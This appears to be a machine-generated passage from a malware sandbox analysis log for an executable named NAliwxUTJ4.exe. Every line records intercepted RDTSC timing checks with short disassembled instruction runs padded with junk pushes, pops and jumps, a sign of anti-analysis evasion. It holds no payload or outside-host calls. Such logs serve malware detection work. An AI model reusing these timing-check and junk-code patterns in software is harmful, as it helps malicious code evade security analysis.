              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5F87B6 second address: 5F87C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007FEBD887DA76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5FB366 second address: 5FB36C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5FB36C second address: 5FB37B instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b push ebx 0x0000000c pushad 0x0000000d popad 0x0000000e pop ebx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 62F116 second address: 62F133 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jmp 00007FEBD887DA87h 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 62F133 second address: 62F139 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 62F139 second address: 62F143 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jg 00007FEBD887DA76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 62F143 second address: 62F149 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 62ECFD second address: 62ED0C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 js 00007FEBD887DA7Eh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 62ED0C second address: 62ED2F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEBD8FBE242h 0x0000000e jc 00007FEBD8FBE238h 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6314BF second address: 6314C3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 631164 second address: 63116A instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 63116A second address: 63117A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jbe 00007FEBD887DA76h 0x0000000e pushad 0x0000000f popad 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 63117A second address: 631184 instructions: 0x00000000 rdtsc 0x00000002 jnl 00007FEBD8FBE236h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 631184 second address: 63118A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 63515F second address: 63519B instructions: 0x00000000 rdtsc 0x00000002 je 00007FEBD8FBE236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jmp 00007FEBD8FBE23Fh 0x0000000f push ecx 0x00000010 jmp 00007FEBD8FBE249h 0x00000015 pop ecx 0x00000016 push eax 0x00000017 push edx 0x00000018 jl 00007FEBD8FBE236h 0x0000001e rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 634BC1 second address: 634BCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jng 00007FEBD887DA76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 634BCB second address: 634BCF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 634E85 second address: 634E93 instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 63A2C9 second address: 63A2FA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEBD8FBE247h 0x00000008 push eax 0x00000009 pop eax 0x0000000a jno 00007FEBD8FBE236h 0x00000010 popad 0x00000011 jnp 00007FEBD8FBE242h 0x00000017 jne 00007FEBD8FBE236h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 63A59F second address: 63A5B8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA85h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 63A5B8 second address: 63A5BD instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E5575 second address: 5E55B0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEBD887DA82h 0x00000009 popad 0x0000000a mov dword ptr [esp], eax 0x0000000d add ecx, dword ptr [ebp+122D3453h] 0x00000013 mov dword ptr [ebp+122D1E43h], ebx 0x00000019 mov ebx, dword ptr [ebp+124805ADh] 0x0000001f mov dword ptr [ebp+1246584Fh], edx 0x00000025 add eax, ebx 0x00000027 push eax 0x00000028 push eax 0x00000029 push edx 0x0000002a push eax 0x0000002b push edx 0x0000002c push eax 0x0000002d push edx 0x0000002e rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E55B0 second address: 5E55B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E55B4 second address: 5E55BA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 5E55BA second address: 5E55C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 63A99A second address: 63A9A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FEBD887DA76h 0x0000000a push eax 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 63E682 second address: 63E686 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 63E686 second address: 63E68A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 63EBE9 second address: 63EC21 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE244h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a jnp 00007FEBD8FBE253h 0x00000010 jmp 00007FEBD8FBE247h 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 63EC21 second address: 63EC29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 push esi 0x00000007 pop esi 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 644392 second address: 644398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 64451B second address: 644525 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FEBD887DA76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6446CC second address: 6446EE instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEBD8FBE23Eh 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jl 00007FEBD8FBE236h 0x00000012 popad 0x00000013 pop edx 0x00000014 pop eax 0x00000015 push eax 0x00000016 pushad 0x00000017 push eax 0x00000018 push edx 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6446EE second address: 644704 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEBD887DA80h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 644F9F second address: 644FBC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007FEBD8FBE247h 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 644FBC second address: 644FC6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 je 00007FEBD887DA76h 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 64527D second address: 645285 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 645285 second address: 6452B6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA80h 0x00000007 jmp 00007FEBD887DA89h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6452B6 second address: 6452BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 645592 second address: 64559E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007FEBD887DA76h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 64559E second address: 6455BD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FEBD8FBE23Dh 0x0000000a pushad 0x0000000b ja 00007FEBD8FBE236h 0x00000011 push ecx 0x00000012 pop ecx 0x00000013 pushad 0x00000014 popad 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6455BD second address: 6455E1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push ebx 0x00000006 je 00007FEBD887DA76h 0x0000000c pop ebx 0x0000000d popad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007FEBD887DA81h 0x00000016 pushad 0x00000017 popad 0x00000018 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6455E1 second address: 64560D instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEBD8FBE236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jg 00007FEBD8FBE238h 0x00000010 push eax 0x00000011 push edx 0x00000012 jmp 00007FEBD8FBE246h 0x00000017 pushad 0x00000018 popad 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 645F40 second address: 645F5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FEBD887DA7Bh 0x00000009 pop ebx 0x0000000a push eax 0x0000000b push edx 0x0000000c jne 00007FEBD887DA76h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 64B837 second address: 64B83B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 64B83B second address: 64B888 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FEBD887DA7Ah 0x0000000b jmp 00007FEBD887DA82h 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 jmp 00007FEBD887DA87h 0x00000018 jmp 00007FEBD887DA81h 0x0000001d rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 64B888 second address: 64B8AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE245h 0x00000007 push edx 0x00000008 jmp 00007FEBD8FBE23Bh 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 64B9BE second address: 64B9CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push edi 0x00000009 pop edi 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 64B9CA second address: 64B9D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 64BAF8 second address: 64BB17 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FEBD887DA89h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 64BB17 second address: 64BB1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 650C4D second address: 650C7B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA85h 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d jmp 00007FEBD887DA7Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 650C7B second address: 650C7F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 657218 second address: 657234 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007FEBD887DA83h 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 657234 second address: 657238 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 657238 second address: 65723C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 65749E second address: 6574A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6574A4 second address: 6574A8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6574A8 second address: 6574BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FEBD8FBE236h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jnp 00007FEBD8FBE236h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6574BE second address: 6574C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 657776 second address: 65777A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 65777A second address: 65778E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push edi 0x00000009 jc 00007FEBD887DA76h 0x0000000f pop edi 0x00000010 push eax 0x00000011 push edx 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 65778E second address: 65779C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b popad 0x0000000c pushad 0x0000000d popad 0x0000000e rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 657AE4 second address: 657AEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 657F51 second address: 657F57 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 657F57 second address: 657F8F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007FEBD887DA86h 0x00000008 jmp 00007FEBD887DA7Dh 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jne 00007FEBD887DA7Ah 0x00000018 pushad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 657F8F second address: 657FAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 ja 00007FEBD8FBE236h 0x0000000a jmp 00007FEBD8FBE23Eh 0x0000000f jng 00007FEBD8FBE236h 0x00000015 popad 0x00000016 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6587E0 second address: 6587E4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 658EFC second address: 658F02 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 658F02 second address: 658F06 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 658F06 second address: 658F32 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE241h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007FEBD8FBE245h 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 658F32 second address: 658F38 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 658F38 second address: 658F64 instructions: 0x00000000 rdtsc 0x00000002 jg 00007FEBD8FBE236h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jnp 00007FEBD8FBE266h 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007FEBD8FBE248h 0x00000019 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 656CF7 second address: 656D09 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jnl 00007FEBD887DA7Ch 0x0000000c rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 656D09 second address: 656D13 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007FEBD8FBE23Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 669295 second address: 6692AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FEBD887DA7Eh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6692AE second address: 6692B2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 6692B2 second address: 6692F0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pushad 0x00000008 jmp 00007FEBD887DA7Fh 0x0000000d push ebx 0x0000000e jo 00007FEBD887DA76h 0x00000014 jmp 00007FEBD887DA86h 0x00000019 pop ebx 0x0000001a pushad 0x0000001b jno 00007FEBD887DA76h 0x00000021 push eax 0x00000022 push edx 0x00000023 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 66FA4D second address: 66FA51 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 674054 second address: 674076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 jg 00007FEBD887DA8Dh 0x0000000b rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 674076 second address: 67407C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 67407C second address: 674080 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 674080 second address: 674084 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 673A7D second address: 673A99 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FEBD887DA81h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c pushad 0x0000000d popad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 673A99 second address: 673AA0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 673C00 second address: 673C17 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA83h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 684A1D second address: 684A59 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD8FBE249h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jmp 00007FEBD8FBE242h 0x0000000e pop esi 0x0000000f push edx 0x00000010 pushad 0x00000011 ja 00007FEBD8FBE236h 0x00000017 pushad 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 689244 second address: 68928E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FEBD887DA83h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jng 00007FEBD887DA78h 0x00000011 push ebx 0x00000012 pop ebx 0x00000013 popad 0x00000014 jo 00007FEBD887DAA3h 0x0000001a jmp 00007FEBD887DA7Ch 0x0000001f pushad 0x00000020 jmp 00007FEBD887DA7Dh 0x00000025 js 00007FEBD887DA76h 0x0000002b push eax 0x0000002c push edx 0x0000002d rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 68928E second address: 689294 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 68EDC7 second address: 68EDE8 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA7Eh 0x00000007 jmp 00007FEBD887DA7Ah 0x0000000c pop edx 0x0000000d pop eax 0x0000000e pushad 0x0000000f pushad 0x00000010 popad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 68D5FE second address: 68D602 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
              Source: C:\Users\user\Desktop\NAliwxUTJ4.exeRDTSC instruction interceptor: First address: 68D602 second address: 68D61E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FEBD887DA88h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
